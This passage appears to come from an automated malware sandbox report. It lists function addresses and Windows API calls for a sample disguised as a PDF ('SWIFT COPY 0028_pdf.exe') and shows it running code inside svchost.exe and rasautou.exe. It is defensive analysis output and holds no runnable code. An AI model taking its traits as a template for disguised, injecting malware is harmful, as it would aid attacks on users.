                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E79C60 NtAllocateVirtualMemory,4_2_02E79C60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00966685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00966685
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0095ACC5
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009679D3
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0094B0430_2_0094B043
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009332000_2_00933200
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00933B700_2_00933B70
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095410F0_2_0095410F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009402A40_2_009402A4
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095038E0_2_0095038E
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0092E3B00_2_0092E3B0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009406D90_2_009406D9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095467F0_2_0095467F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0098AACE0_2_0098AACE
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00954BEF0_2_00954BEF
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0094CCC10_2_0094CCC1
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00926F070_2_00926F07
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0092AF500_2_0092AF50
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009831BC0_2_009831BC
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0094D1B90_2_0094D1B9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093B11F0_2_0093B11F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0094123A0_2_0094123A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095724D0_2_0095724D
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009613CA0_2_009613CA
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009293F00_2_009293F0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093F5630_2_0093F563
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009296C00_2_009296C0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096B6CC0_2_0096B6CC
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009277B00_2_009277B0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0098F7FF0_2_0098F7FF
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009579C90_2_009579C9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093FA570_2_0093FA57
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00929B600_2_00929B60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00927D190_2_00927D19
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00949ED00_2_00949ED0
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093FE6F0_2_0093FE6F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00927FA30_2_00927FA3
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_010284F80_2_010284F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C932_2_00418C93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030602_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010E02_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022C02_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022BA2_2_004022BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013B02_2_004013B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F4232_2_0042F423
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024282_2_00402428
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024302_2_00402430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104A32_2_004104A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004106C32_2_004106C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026F62_2_004026F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416E8F2_2_00416E8F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416E932_2_00416E93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E7432_2_0040E743
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027002_2_00402700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC02C02_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF41A22_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD20002_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE44202_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBEFA02_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE2F302_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDCD1F2_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C856302_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D095C32_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD22_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD52_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DE0EDB3_2_02DE0EDB
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DE0ED73_2_02DE0ED7
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DD878B3_2_02DD878B
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DDA70B3_2_02DDA70B
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DE2CDB3_2_02DE2CDB
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DDA4EB3_2_02DDA4EB
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DF946B3_2_02DF946B
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EBE4F64_2_04EBE4F6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC24464_2_04EC2446
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB44204_2_04EB4420
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ED05914_2_04ED0591
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E105354_2_04E10535
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2C6E04_2_04E2C6E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E0C7C04_2_04E0C7C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E107704_2_04E10770
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E347504_2_04E34750
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EA20004_2_04EA2000
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC81CC4_2_04EC81CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ED01AA4_2_04ED01AA
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC41A24_2_04EC41A2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E981584_2_04E98158
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E001004_2_04E00100
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EAA1184_2_04EAA118
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E902C04_2_04E902C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB02744_2_04EB0274
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ED03E64_2_04ED03E6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1E3F04_2_04E1E3F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECA3524_2_04ECA352
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E00CF24_2_04E00CF2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB0CB54_2_04EB0CB5
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E10C004_2_04E10C00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E0ADE04_2_04E0ADE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E28DBF4_2_04E28DBF
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1AD004_2_04E1AD00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EACD1F4_2_04EACD1F
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECEEDB4_2_04ECEEDB
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E22E904_2_04E22E90
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECCE934_2_04ECCE93
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E10E594_2_04E10E59
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECEE264_2_04ECEE26
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1CFE04_2_04E1CFE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E02FC84_2_04E02FC8
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E8EFA04_2_04E8EFA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E84F404_2_04E84F40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E52F284_2_04E52F28
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E30F304_2_04E30F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB2F304_2_04EB2F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E3E8F04_2_04E3E8F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04DF68B84_2_04DF68B8
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1A8404_2_04E1A840
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E128404_2_04E12840
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E129A04_2_04E129A0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EDA9A64_2_04EDA9A6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E269624_2_04E26962
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E0EA804_2_04E0EA80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC6BD74_2_04EC6BD7
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECAB404_2_04ECAB40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E014604_2_04E01460
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECF43F4_2_04ECF43F
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ED95C34_2_04ED95C3
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EAD5B04_2_04EAD5B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC75714_2_04EC7571
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC16CC4_2_04EC16CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E556304_2_04E55630
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECF7B04_2_04ECF7B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC70E94_2_04EC70E9
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECF0E04_2_04ECF0E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E170C04_2_04E170C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EBF0CC4_2_04EBF0CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1B1B04_2_04E1B1B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EDB16B4_2_04EDB16B
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E4516C4_2_04E4516C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04DFF1724_2_04DFF172
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB12ED4_2_04EB12ED
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2B2C04_2_04E2B2C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E152A04_2_04E152A0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E5739A4_2_04E5739A
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04DFD34C4_2_04DFD34C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC132D4_2_04EC132D
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFCF24_2_04ECFCF2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E89C324_2_04E89C32
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2FDC04_2_04E2FDC0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC7D734_2_04EC7D73
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E13D404_2_04E13D40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC1D5A4_2_04EC1D5A
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E19EB04_2_04E19EB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFFB14_2_04ECFFB1
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E11F924_2_04E11F92
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFF094_2_04ECFF09
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E138E04_2_04E138E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E7D8004_2_04E7D800
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E199504_2_04E19950
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2B9504_2_04E2B950
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EA59104_2_04EA5910
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EBDAC64_2_04EBDAC6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E55AA04_2_04E55AA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EADAAC4_2_04EADAAC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB1AA34_2_04EB1AA3
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E83A6C4_2_04E83A6C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFA494_2_04ECFA49
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC7A464_2_04EC7A46
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E85BF04_2_04E85BF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E4DBF94_2_04E4DBF9
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2FB804_2_04E2FB80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFB764_2_04ECFB76
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E622F04_2_02E622F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E7C1404_2_02E7C140
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E5D3E04_2_02E5D3E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E5D1C04_2_02E5D1C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E5B4604_2_02E5B460
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E63BAC4_2_02E63BAC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E63BB04_2_02E63BB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E659B04_2_02E659B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCE4284_2_04CCE428
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCE5434_2_04CCE543
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCE8DC4_2_04CCE8DC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCD9A84_2_04CCD9A8
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: String function: 0093EC2F appears 68 times
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: String function: 00946AC0 appears 42 times
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: String function: 0094F8A0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 04E57E54 appears 111 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 04DFB970 appears 280 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 04E8F290 appears 105 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 04E7EA12 appears 86 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 04E45130 appears 58 times
